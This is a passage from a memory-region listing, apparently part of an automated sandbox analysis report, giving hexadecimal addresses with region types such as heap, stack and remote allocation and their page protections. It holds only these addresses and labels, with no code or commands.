trusted library allocation
|
page read and write
|
||
|
4EA6000
|
trusted library allocation
|
page read and write
|
||
|
822E000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2BC6C000
|
system
|
page read and write
|
||
|
4C9C000
|
trusted library allocation
|
page read and write
|
||
|
23238DD9000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1000000
|
unkown
|
page readonly
|
||
|
23238792000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238DD8000
|
heap
|
page read and write
|
||
|
23238C09000
|
heap
|
page read and write
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2B0E000
|
stack
|
page read and write
|
||
|
3E9B000
|
remote allocation
|
page execute and read and write
|
||
|
23238BE1000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7F00000
|
heap
|
page read and write
|
||
|
1FCF5B9B000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
47D0000
|
direct allocation
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
81D4000
|
heap
|
page read and write
|
||
|
23238745000
|
heap
|
page read and write
|
||
|
240C000
|
unkown
|
page read and write
|
||
|
8219000
|
heap
|
page read and write
|
||
|
2323878D000
|
heap
|
page read and write
|
||
|
49DE000
|
stack
|
page read and write
|
||
|
1FAFE000
|
stack
|
page read and write
|
||
|
1FCDD240000
|
heap
|
page execute and read and write
|
||
|
47E0000
|
direct allocation
|
page read and write
|
||
|
2D6E000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4F54000
|
trusted library allocation
|
page read and write
|
||
|
1FE82000
|
heap
|
page read and write
|
||
|
DD233B8000
|
stack
|
page read and write
|
||
|
23238ED0000
|
heap
|
page read and write
|
||
|
23238C77000
|
heap
|
page read and write
|
||
|
1DEED621000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
23238720000
|
heap
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
4663000
|
heap
|
page read and write
|
||
|
1FCED85B000
|
trusted library allocation
|
page read and write
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
47A0000
|
direct allocation
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238C0C000
|
heap
|
page read and write
|
||
|
8E62DFE000
|
stack
|
page read and write
|
||
|
2030D000
|
direct allocation
|
page execute and read and write
|
||
|
232387C8000
|
heap
|
page read and write
|
||
|
23239312000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDBA40000
|
heap
|
page readonly
|
||
|
232392FA000
|
heap
|
page read and write
|
||
|
204AD000
|
direct allocation
|
page execute and read and write
|
||
|
4800000
|
direct allocation
|
page read and write
|
||
|
7E00000
|
heap
|
page read and write
|
||
|
23238767000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
540000
|
unkown
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
8530000
|
direct allocation
|
page read and write
|
||
|
23238DD2000
|
heap
|
page read and write
|
||
|
1DE015A8000
|
heap
|
page read and write
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
84B0000
|
trusted library allocation
|
page read and write
|
||
|
23238769000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
11E0000
|
unkown
|
page readonly
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
430000
|
unkown
|
page readonly
|
||
|
1FCDB848000
|
heap
|
page read and write
|
||
|
1FCDF30F000
|
trusted library allocation
|
page read and write
|
||
|
33A9000
|
heap
|
page read and write
|
||
|
1FFA5000
|
heap
|
page read and write
|
||
|
23238C55000
|
heap
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
56E000
|
stack
|
page read and write
|
||
|
2BB5000
|
trusted library allocation
|
page execute and read and write
|
||
|
DD2420B000
|
stack
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
4BAC000
|
stack
|
page read and write
|
||
|
1DE015A0000
|
heap
|
page read and write
|
||
|
233C8000
|
unclassified section
|
page execute and read and write
|
||
|
1DEED500000
|
trusted library allocation
|
page read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
824A000
|
heap
|
page read and write
|
||
|
7108000
|
heap
|
page read and write
|
||
|
23239312000
|
heap
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
3438000
|
heap
|
page read and write
|
||
|
19B1000
|
unkown
|
page readonly
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
815C000
|
stack
|
page read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
1FD0E000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887AC0000
|
trusted library allocation
|
page read and write
|
||
|
FA000
|
stack
|
page read and write
|
||
|
1FCDF4E0000
|
trusted library allocation
|
page read and write
|
||
|
57DE000
|
trusted library allocation
|
page read and write
|
||
|
DD22F7E000
|
stack
|
page read and write
|
||
|
1FCF5BAC000
|
heap
|
page read and write
|
||
|
81BF000
|
heap
|
page read and write
|
||
|
7FF887956000
|
trusted library allocation
|
page execute and read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
7E0000
|
unkown
|
page readonly
|
||
|
442F000
|
stack
|
page read and write
|
||
|
2323940A000
|
heap
|
page read and write
|
||
|
232392DF000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887A2A000
|
trusted library allocation
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7DF7000
|
stack
|
page read and write
|
||
|
595BDF000
|
stack
|
page read and write
|
||
|
4A48000
|
unkown
|
page execute and read and write
|
||
|
23238C91000
|
heap
|
page read and write
|
||
|
23238721000
|
heap
|
page read and write
|
||
|
1FCDB852000
|
heap
|
page read and write
|
||
|
90000
|
unkown
|
page readonly
|
||
|
4AFC000
|
stack
|
page read and write
|
||
|
8900000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
839E000
|
stack
|
page read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
53A2000
|
unclassified section
|
page read and write
|
||
|
4531000
|
trusted library allocation
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
33A7000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
8560000
|
direct allocation
|
page read and write
|
||
|
7FF887B10000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23236DAF000
|
heap
|
page read and write
|
||
|
1FCDDA54000
|
trusted library allocation
|
page read and write
|
||
|
23238767000
|
heap
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
11C0000
|
unkown
|
page readonly
|
||
|
11D0000
|
unkown
|
page readonly
|
||
|
D41000
|
unkown
|
page readonly
|
||
|
7FB0000
|
trusted library allocation
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
2323872A000
|
heap
|
page read and write
|
||
|
4790000
|
direct allocation
|
page read and write
|
||
|
232387F0000
|
heap
|
page read and write
|
||
|
4EAE000
|
stack
|
page read and write
|
||
|
1FCDF5BB000
|
trusted library allocation
|
page read and write
|
||
|
23238CA1000
|
heap
|
page read and write
|
||
|
7FF88792C000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887B40000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF887AF0000
|
trusted library allocation
|
page read and write
|
||
|
8E62EFE000
|
stack
|
page read and write
|
||
|
315E000
|
stack
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4629000
|
heap
|
page read and write
|
||
|
23238739000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
4D3F000
|
stack
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
26D0000
|
direct allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
1FCF58A6000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
970000
|
trusted library section
|
page read and write
|
||
|
23238749000
|
heap
|
page read and write
|
||
|
4629000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7FF88787D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
809C000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
19CFE8B0000
|
heap
|
page read and write
|
||
|
466F000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
450000
|
unkown
|
page readonly
|
||
|
7E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCDBA65000
|
heap
|
page read and write
|
||
|
4610000
|
heap
|
page read and write
|
||
|
D41000
|
unkown
|
page readonly
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FB7D000
|
stack
|
page read and write
|
||
|
23238BFD000
|
heap
|
page read and write
|
||
|
232387EB000
|
heap
|
page read and write
|
||
|
1370000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
551000
|
unkown
|
page readonly
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
23238CFE000
|
heap
|
page read and write
|
||
|
4520000
|
heap
|
page read and write
|
||
|
1FCDF3BB000
|
trusted library allocation
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FBBC000
|
stack
|
page read and write
|
||
|
1FCDDA50000
|
trusted library allocation
|
page read and write
|
||
|
8214000
|
heap
|
page read and write
|
||
|
7F85000
|
trusted library allocation
|
page read and write
|
||
|
81B7000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4820000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
71B7000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
21FC8000
|
unclassified section
|
page execute and read and write
|
||
|
232392E8000
|
heap
|
page read and write
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
8235000
|
heap
|
page read and write
|
||
|
2B83000
|
trusted library allocation
|
page execute and read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
81D2000
|
heap
|
page read and write
|
||
|
23238721000
|
heap
|
page read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
23239302000
|
heap
|
page read and write
|
||
|
1FCDDD87000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
unkown
|
page readonly
|
||
|
23238C3D000
|
heap
|
page read and write
|
||
|
29AB000
|
stack
|
page read and write
|
||
|
23238D3E000
|
heap
|
page read and write
|
||
|
DD2317E000
|
stack
|
page read and write
|
||
|
1FCF593A000
|
heap
|
page read and write
|
||
|
2E5E000
|
stack
|
page read and write
|
||
|
2A3B000
|
stack
|
page read and write
|
||
|
8230000
|
heap
|
page read and write
|
||
|
23238761000
|
heap
|
page read and write
|
||
|
7FF887A90000
|
trusted library allocation
|
page read and write
|
||
|
1DE017D5000
|
heap
|
page read and write
|
||
|
4663000
|
heap
|
page read and write
|
||
|
1FCED561000
|
trusted library allocation
|
page read and write
|
||
|
23238D3E000
|
heap
|
page read and write
|
||
|
23238C55000
|
heap
|
page read and write
|
||
|
1DEED603000
|
trusted library allocation
|
page read and write
|
||
|
1DEEBC10000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
47F0000
|
direct allocation
|
page read and write
|
||
|
232387A6000
|
heap
|
page read and write
|
||
|
1FC000
|
stack
|
page read and write
|
||
|
1FA20000
|
heap
|
page read and write
|
||
|
50BD000
|
direct allocation
|
page execute and read and write
|
||
|
1DEEBC40000
|
heap
|
page read and write
|
||
|
7FF887880000
|
trusted library allocation
|
page read and write
|
||
|
1FCF5918000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
824E000
|
heap
|
page read and write
|
||
|
21DE000
|
system
|
page execute and read and write
|
||
|
1DEED60F000
|
trusted library allocation
|
page read and write
|
||
|
7180000
|
trusted library allocation
|
page read and write
|
||
|
46D000
|
stack
|
page read and write
|
||
|
6A1F000
|
stack
|
page read and write
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
1FCF597A000
|
heap
|
page read and write
|
||
|
4629000
|
heap
|
page read and write
|
||
|
23238766000
|
heap
|
page read and write
|
||
|
4A50000
|
heap
|
page read and write
|
||
|
23238CB0000
|
heap
|
page read and write
|
||
|
29B4000
|
unkown
|
page read and write
|
||
|
1FCF58F2000
|
heap
|
page read and write
|
||
|
8E634FF000
|
stack
|
page read and write
|
||
|
3459000
|
heap
|
page read and write
|
||
|
23238796000
|
heap
|
page read and write
|
||
|
23238BE1000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDB8B0000
|
heap
|
page read and write
|
||
|
D3A9FFE000
|
stack
|
page read and write
|
||
|
7FF887872000
|
trusted library allocation
|
page read and write
|
||
|
84F0000
|
direct allocation
|
page read and write
|
||
|
7F680000
|
trusted library allocation
|
page execute and read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
1FCDD561000
|
trusted library allocation
|
page read and write
|
||
|
23238C0C000
|
heap
|
page read and write
|
||
|
90000
|
unkown
|
page readonly
|
||
|
1FCDD9E8000
|
trusted library allocation
|
page read and write
|
||
|
232392E0000
|
heap
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
746B000
|
stack
|
page read and write
|
||
|
81F1000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238BF5000
|
heap
|
page read and write
|
||
|
1FCDEE1A000
|
trusted library allocation
|
page read and write
|
||
|
23238BF3000
|
heap
|
page read and write
|
||
|
19B1000
|
unkown
|
page readonly
|
||
|
DD23338000
|
stack
|
page read and write
|
||
|
2235000
|
system
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
8500000
|
direct allocation
|
page read and write
|
||
|
11D0000
|
unkown
|
page readonly
|
||
|
2323875E000
|
heap
|
page read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
2323872D000
|
heap
|
page read and write
|
||
|
7FF887B50000
|
trusted library allocation
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
1240000
|
unkown
|
page read and write
|
||
|
2B8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23238C8F000
|
heap
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
232392D1000
|
heap
|
page read and write
|
||
|
1DEED701000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B00000
|
trusted library allocation
|
page read and write
|
||
|
1FCF5D60000
|
heap
|
page read and write
|
||
|
2323881E000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
521C000
|
stack
|
page read and write
|
||
|
22BE000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238850000
|
heap
|
page read and write
|
||
|
2323931D000
|
heap
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238C2D000
|
heap
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
23238C18000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2BA0000
|
trusted library allocation
|
page read and write
|
||
|
1374000
|
heap
|
page read and write
|
||
|
232392F5000
|
heap
|
page read and write
|
||
|
23238C22000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FD70000
|
remote allocation
|
page read and write
|
||
|
80000
|
unkown
|
page readonly
|
||
|
232387E3000
|
heap
|
page read and write
|
||
|
5B0000
|
unkown
|
page read and write
|
||
|
232387AB000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7228000
|
trusted library allocation
|
page read and write
|
||
|
8E631FF000
|
stack
|
page read and write
|
||
|
551000
|
unkown
|
page readonly
|
||
|
6CAD000
|
stack
|
page read and write
|
||
|
1DEED7BE000
|
trusted library allocation
|
page read and write
|
||
|
450000
|
unkown
|
page readonly
|
||
|
5448000
|
unkown
|
page execute and read and write
|
||
|
811E000
|
stack
|
page read and write
|
||
|
820000
|
trusted library section
|
page read and write
|
||
|
26D0000
|
direct allocation
|
page read and write
|
||
|
5559000
|
trusted library allocation
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
595E7E000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
201CF000
|
heap
|
page read and write
|
||
|
2690000
|
direct allocation
|
page read and write
|
||
|
1331000
|
unkown
|
page readonly
|
||
|
23238FA4000
|
heap
|
page read and write
|
||
|
45B7000
|
heap
|
page read and write
|
||
|
1360000
|
unkown
|
page readonly
|
||
|
6AEB000
|
stack
|
page read and write
|
||
|
23238810000
|
heap
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
8550000
|
direct allocation
|
page read and write
|
||
|
20522000
|
direct allocation
|
page execute and read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
2E1D000
|
stack
|
page read and write
|
||
|
D3AA7FE000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238C05000
|
heap
|
page read and write
|
||
|
4780000
|
direct allocation
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
6BEA000
|
stack
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
90A000
|
heap
|
page read and write
|
||
|
2037E000
|
direct allocation
|
page execute and read and write
|
||
|
1374000
|
heap
|
page read and write
|
||
|
48E9000
|
stack
|
page read and write
|
||
|
4B05000
|
trusted library allocation
|
page read and write
|
||
|
1FCF5933000
|
heap
|
page read and write
|
||
|
81AF000
|
heap
|
page read and write
|
||
|
449C000
|
stack
|
page read and write
|
||
|
49DB000
|
unkown
|
page execute and read and write
|
||
|
23238C0C000
|
heap
|
page read and write
|
||
|
8E636FB000
|
stack
|
page read and write
|
||
|
29E9000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDD3A5000
|
heap
|
page read and write
|
||
|
23238ED1000
|
heap
|
page read and write
|
||
|
68EF000
|
stack
|
page read and write
|
||
|
1FCDBA30000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
21C2000
|
system
|
page execute and read and write
|
||
|
4F0E000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238732000
|
heap
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
22E4000
|
heap
|
page read and write
|
||
|
23238D9D000
|
heap
|
page read and write
|
||
|
23236F65000
|
heap
|
page read and write
|
||
|
23238BF5000
|
heap
|
page read and write
|
||
|
232387D3000
|
heap
|
page read and write
|
||
|
44DE000
|
stack
|
page read and write
|
||
|
2A00000
|
remote allocation
|
page execute and read and write
|
||
|
6CF0000
|
heap
|
page read and write
|
||
|
2FF9000
|
heap
|
page read and write
|
||
|
4623000
|
heap
|
page read and write
|
||
|
88FF000
|
stack
|
page read and write
|
||
|
4674000
|
heap
|
page read and write
|
||
|
4FBE000
|
stack
|
page read and write
|
||
|
1FCDBA60000
|
heap
|
page read and write
|
||
|
1FCF58A0000
|
heap
|
page read and write
|
||
|
2FB8000
|
heap
|
page read and write
|
||
|
4663000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDB819000
|
heap
|
page read and write
|
||
|
7FF887874000
|
trusted library allocation
|
page read and write
|
||
|
1FCDF312000
|
trusted library allocation
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
5E48000
|
unkown
|
page execute and read and write
|
||
|
1FCDF331000
|
trusted library allocation
|
page read and write
|
||
|
23238C55000
|
heap
|
page read and write
|
||
|
1FE81000
|
heap
|
page read and write
|
||
|
1DEED470000
|
trusted library allocation
|
page read and write
|
||
|
519F000
|
stack
|
page read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
2B4F000
|
stack
|
page read and write
|
||
|
1DEEBC6F000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
4D4A000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
1FCDDDC4000
|
trusted library allocation
|
page read and write
|
||
|
A0F000
|
stack
|
page read and write
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
8246000
|
heap
|
page read and write
|
||
|
1FCF5B4D000
|
heap
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
1DEED460000
|
heap
|
page read and write
|
||
|
81BB000
|
heap
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238D22000
|
heap
|
page read and write
|
||
|
525D000
|
direct allocation
|
page execute and read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
8920000
|
heap
|
page read and write
|
||
|
7FF887BB0000
|
trusted library allocation
|
page read and write
|
||
|
23238BF7000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
232387B6000
|
heap
|
page read and write
|
||
|
1240000
|
unkown
|
page read and write
|
||
|
4610000
|
heap
|
page read and write
|
||
|
23238C59000
|
heap
|
page read and write
|
||
|
13E0000
|
unkown
|
page read and write
|
||
|
B4F000
|
stack
|
page read and write
|
||
|
23238BD6000
|
heap
|
page read and write
|
||
|
1FCF5B8E000
|
heap
|
page read and write
|
||
|
DD2400E000
|
stack
|
page read and write
|
||
|
23238C6F000
|
heap
|
page read and write
|
||
|
8540000
|
direct allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
8209000
|
heap
|
page read and write
|
||
|
20031000
|
heap
|
page read and write
|
||
|
2690000
|
direct allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
7DF000
|
unkown
|
page read and write
|
||
|
1FCED581000
|
trusted library allocation
|
page read and write
|
||
|
27BD000
|
stack
|
page read and write
|
||
|
86F000
|
heap
|
page read and write
|
||
|
23238DD8000
|
heap
|
page read and write
|
||
|
6CEB000
|
stack
|
page read and write
|
||
|
23238C77000
|
heap
|
page read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
232387C0000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
D3A8FFB000
|
stack
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
23238CA9000
|
heap
|
page read and write
|
||
|
2FB0000
|
unkown
|
page execute and read and write
|
||
|
3475000
|
heap
|
page read and write
|
||
|
8FC000
|
heap
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
8570000
|
direct allocation
|
page read and write
|
||
|
512E000
|
direct allocation
|
page execute and read and write
|
||
|
1FCDD787000
|
trusted library allocation
|
page read and write
|
||
|
4608000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
1FCCD000
|
stack
|
page read and write
|
||
|
6F91000
|
heap
|
page read and write
|
||
|
69DE000
|
stack
|
page read and write
|
||
|
1FC000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
DD22BF3000
|
stack
|
page read and write
|
||
|
23238C50000
|
heap
|
page read and write
|
||
|
2B99000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2BA52000
|
system
|
page read and write
|
||
|
81CF000
|
heap
|
page read and write
|
||
|
4F90000
|
direct allocation
|
page execute and read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1010000
|
unkown
|
page readonly
|
||
|
1FCF5AA0000
|
heap
|
page read and write
|
||
|
1FCDBA10000
|
trusted library allocation
|
page read and write
|
||
|
2770000
|
heap
|
page read and write
|
||
|
2323873D000
|
heap
|
page read and write
|
||
|
23236E6B000
|
heap
|
page read and write
|
||
|
1FCDF3A3000
|
trusted library allocation
|
page read and write
|
||
|
72AE000
|
stack
|
page read and write
|
||
|
891A000
|
heap
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
5E7000
|
heap
|
page read and write
|
||
|
23239409000
|
heap
|
page read and write
|
||
|
50B9000
|
direct allocation
|
page execute and read and write
|
||
|
DD235BE000
|
stack
|
page read and write
|
||
|
4683000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1427000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
D0C000
|
stack
|
page read and write
|
||
|
27D5000
|
heap
|
page read and write
|
||
|
8914000
|
heap
|
page read and write
|
||
|
1FE3B000
|
stack
|
page read and write
|
||
|
8D3000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
476E000
|
stack
|
page read and write
|
||
|
23238754000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
1FCF5B2E000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
8E633FC000
|
stack
|
page read and write
|
||
|
23238CB0000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238C8D000
|
heap
|
page read and write
|
||
|
45A0000
|
direct allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
118C000
|
stack
|
page read and write
|
||
|
6955000
|
heap
|
page execute and read and write
|
||
|
4C30000
|
heap
|
page read and write
|
||
|
23238C2D000
|
heap
|
page read and write
|
||
|
27F0000
|
heap
|
page readonly
|
||
|
1FCDDDDA000
|
trusted library allocation
|
page read and write
|
||
|
887F000
|
stack
|
page read and write
|
||
|
8273000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
83DD000
|
stack
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
20F30000
|
unclassified section
|
page execute and read and write
|
||
|
699F000
|
stack
|
page read and write
|
||
|
4D30000
|
trusted library allocation
|
page read and write
|
||
|
35B000
|
unkown
|
page read and write
|
||
|
358000
|
unkown
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCDB790000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
59A4000
|
unclassified section
|
page read and write
|
||
|
823B000
|
heap
|
page read and write
|
||
|
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
|
23238DDC000
|
heap
|
page read and write
|
||
|
1370000
|
heap
|
page read and write
|
||
|
47C0000
|
direct allocation
|
page read and write
|
||
|
460A000
|
heap
|
page read and write
|
||
|
2B992000
|
system
|
page read and write
|
||
|
496E000
|
stack
|
page read and write
|
||
|
1FCDDCD6000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
23238D44000
|
heap
|
page read and write
|
||
|
5531000
|
trusted library allocation
|
page read and write
|
||
|
19CFE6C0000
|
heap
|
page read and write
|
||
|
23236E5E000
|
heap
|
page read and write
|
||
|
7FF887A10000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1FCF58A9000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4663000
|
